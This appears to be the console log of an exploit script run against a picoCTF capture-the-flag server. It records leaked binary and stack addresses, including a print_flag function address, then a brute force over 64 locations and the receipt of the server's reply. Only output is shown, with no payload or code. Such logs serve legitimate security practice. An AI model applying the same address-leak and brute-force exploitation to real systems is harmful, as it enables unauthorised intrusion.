[x] Opening connection to shape-facility.picoctf.net on port 58477
[x] Opening connection to shape-facility.picoctf.net on port 58477: Trying 3.20.150.139
[+] Opening connection to shape-facility.picoctf.net on port 58477: Done
[*] Base: 0x5efc212f2000
[*] print_flag: 0x5efc212f3269
[*] Stack22: 0x7fff317e00d0
[*] Stack24: 0x7fff317e0080
[*] Testing 64 possible locations...
[*] Tested 10/64 locations...
[*] Tested 20/64 locations...
[*] Tested 30/64 locations...
[*] Tested 40/64 locations...
[*] Tested 50/64 locations...
[*] Tested 60/64 locations...
[x] Receiving all data
[x] Receiving all data: 1B
[x] Receiving all data: 57B
[x] Receiving all data: 79B
[+] Receiving all data: Done (79B)
[*] Closed connection to shape-facility.picoctf.net port 58477
